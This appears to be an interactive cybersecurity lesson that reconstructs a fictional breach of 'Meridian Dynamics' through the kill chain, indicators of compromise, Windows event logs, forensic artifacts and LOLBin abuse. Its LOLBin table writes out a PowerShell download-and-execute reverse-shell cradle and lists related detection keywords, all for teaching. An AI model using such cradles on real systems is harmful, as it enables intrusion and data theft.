"The Threat Within" — Kill Chain, Forensics, Detection
Ray Donovan needs a full incident briefing. Reconstruct the complete attack timeline using forensic evidence, kill chain analysis, and detection techniques.
The Kill Chain Model
Every cyberattack follows a pattern. In 2011, Lockheed Martin formalized this pattern into the Cyber Kill Chain — a sequence of stages that every attacker must progress through to achieve their objective. If you can break any link in the chain, you stop the attack.
The kill chain has seven stages. Here is each stage mapped to what the attacker did to Meridian Dynamics:
| Stage | Description | Meridian Breach |
|---|---|---|
| 1. Reconnaissance | Gather information about the target — network layout, users, services, vulnerabilities. | Connected to Guest WiFi (VLAN 99), discovered VLAN boundary bypass, performed LDAP enumeration against MD-DC01 to find the t.manning account. |
| 2. Initial Access | Gain a foothold — exploit a vulnerability, use stolen credentials, or social-engineer a user. | Brute-forced t.manning's password ("Meridian2023!") with 14 failed attempts, then authenticated with valid domain credentials. |
| 3. Execution | Run malicious code or commands on the target system. | Used RDP (Remote Desktop Protocol) to log into MD-WEB01 using t.manning's IT-Admins group membership. Executed commands on the server. |
| 4. Persistence | Establish mechanisms to maintain access even if the initial entry point is closed. | Created a scheduled task ("SystemHealthCheck") with a Base64-encoded PowerShell reverse shell running every 6 hours. Deployed a fake svchost.exe in C:\Users\Public\Downloads\. |
| 5. Lateral Movement | Move from the initial foothold to other systems to reach high-value targets. | From MD-WEB01, accessed the file server MD-FS01 — reaching both the Finance$ and Engineering shares. |
| 6. Collection | Gather and stage data for exfiltration. | Copied quarterly financials, IoT firmware source code, and employee records. Staged everything in C:\Windows\Temp\ as a compressed ZIP archive. |
| 7. Exfiltration | Extract the stolen data from the network to an external location. | Used the reverse shell's HTTPS C2 channel (port 443) to exfiltrate the ZIP archive, blending with legitimate web traffic. |
Indicators of Compromise (IoCs)
Indicators of Compromise (IoCs) are forensic artifacts that indicate a system has been breached. They are the digital fingerprints attackers leave behind. IoCs fall into three categories:
- File hashes — SHA256/MD5 hash of malicious files (e.g., the fake svchost.exe hash doesn't match Microsoft's legitimate version)
- File paths — Files in unusual locations (svchost.exe in C:\Users\Public\Downloads\ instead of C:\Windows\System32\)
- File names — Legitimate names used deceptively (svchost.exe, csrss.exe, lsass.exe in the wrong directory)
- IP addresses — External C2 server IP: 198.51.100.23
- Domains — Malicious domains used for command-and-control
- Ports/Protocols — Unexpected outbound HTTPS traffic from MD-WEB01 (a web server shouldn't be making outbound connections)
- Traffic patterns — Cross-VLAN traffic from Guest WiFi (VLAN 99) to Corp network (VLAN 40)
- Registry keys — Run keys and scheduled task entries created by the attacker
- Scheduled tasks — "SystemHealthCheck" task running a PowerShell reverse shell
- Processes — svchost.exe running from a user directory instead of System32
- Event logs — 14 failed logons (4625) followed by success (4624) for t.manning at 3:14 AM
Malware Analysis Basics
Static analysis examines a suspicious file without running it. It is safe and reveals a surprising amount of information:
| Technique | What It Reveals | Meridian Example |
|---|---|---|
| File Hash | Unique fingerprint. Compare against known-good hashes from Microsoft. | SHA256 of fake svchost.exe does NOT match the legitimate Microsoft hash. |
| Strings | Readable text embedded in the binary — URLs, IP addresses, commands. | Contains strings like "198.51.100.23", "shell.ps1", "DownloadString". |
| PE Headers | Portable Executable metadata — compilation timestamp, imports, sections. | Compilation timestamp doesn't match Microsoft build dates. No valid digital signature. |
| File Path | Where the file is located on disk. Legitimate system files have specific homes. | C:\Users\Public\Downloads\svchost.exe — wrong path! Real svchost lives in C:\Windows\System32\. |
| Digital Signature | Microsoft signs all legitimate system binaries with a code-signing certificate. | The fake svchost.exe has no valid signature, or a self-signed certificate. |
Windows Forensic Artifacts
Windows is a forensic goldmine. Even when attackers try to cover their tracks, the OS records activity in dozens of places. Here are the key artifact categories:
| Event ID | Log | Meaning | Meridian Relevance |
|---|---|---|---|
| 4624 | Security | Successful logon | t.manning's successful logon after brute force |
| 4625 | Security | Failed logon | 14 failed attempts against t.manning at 3:14 AM |
| 4672 | Security | Special privileges assigned | t.manning got admin token due to IT-Admins membership |
| 4688 | Security | Process creation | Fake svchost.exe launched from wrong path |
| 4698 | Security | Scheduled task created | "SystemHealthCheck" task with PowerShell payload |
| 5140 | Security | Network share accessed | t.manning accessing Finance$ and Engineering shares |
| 1102 | Security | Audit log was cleared | Attacker attempted to clear the Security log |
- ShellBags — Records every folder a user has ever browsed in Explorer. Even if files are deleted, the folder history remains.
- MRU (Most Recently Used) — Tracks recently opened files, typed paths, and search queries.
- USB History — HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR records every USB device ever connected.
- Run Keys — HKLM\Software\Microsoft\Windows\CurrentVersion\Run — programs that launch at startup. Attackers add persistence here.
- Modified — When file content was last changed
- Accessed — When file was last read
- Changed (MFT) — When file metadata was last modified
- Born (Created) — When file was first created
Timestomping (faking timestamps) is a common anti-forensic technique, but the $MFT internal timestamps are harder to tamper with.
Windows caches information about recently executed programs to speed up future launches. Each .pf file records the executable name, run count, last run time, and files/directories accessed. Even if an attacker deletes the malware, the Prefetch file may still prove it ran.
LOLBins — Living Off the Land
LOLBins (Living Off the Land Binaries) are legitimate Windows tools that attackers abuse to avoid detection. Because these binaries are signed by Microsoft and already present on every Windows machine, they bypass application whitelisting and don't trigger antivirus alerts.
| LOLBin | Legitimate Purpose | Attacker Abuse | Meridian Usage |
|---|---|---|---|
| powershell.exe | System administration and automation scripting | Download and execute payloads, run encoded commands, create reverse shells | Base64-encoded reverse shell: powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(...)" |
| certutil.exe | Certificate management utility | Download files from the internet, encode/decode Base64 data | Could be used instead of PowerShell for file download |
| mshta.exe | Execute HTML Application (.hta) files | Execute arbitrary scripts hosted on remote servers | Alternative execution method for payloads |
| rundll32.exe | Execute DLL functions | Run malicious DLLs, execute JavaScript via url.dll | Alternative persistence mechanism |
| schtasks.exe | Manage scheduled tasks | Create persistence through recurring tasks | Created "SystemHealthCheck" scheduled task |
The Meridian attacker used PowerShell with the -nop (no profile) and -w hidden (hidden window) flags to run a reverse shell that downloads and executes a remote script. The command was Base64-encoded to avoid simple string detection. The schtasks.exe utility was used to schedule this payload to run every 6 hours.
-EncodedCommand, -nop, -w hidden, IEX, DownloadString, Net.WebClient. Windows Event ID 4104 (Script Block Logging) captures the decoded PowerShell commands.
Kill Chain Diagram — Meridian Dynamics Breach
Click any node to see the full details for that attack stage.
LDAP Enum
Brute Force
MD-WEB01
Fake svchost.exe
Finance & Eng
ZIP in Temp
Port 443
Evidence Map — Forensic Layers
Click each evidence layer to explore the artifacts left behind at each level.
Attack Timeline Replay — The Meridian Dynamics Breach
Replay the 21-day attack step by step. Toggle between the attacker's perspective, the defender's perspective, or view both simultaneously. Use the slider to jump to any day.
Security Lab: Incident Forensics Briefing
Get-FileHash on the suspicious svchost.exe to get its SHA256 hash. Compare it mentally with the legitimate one.Get-Item. Note the file path — is this where svchost.exe should live?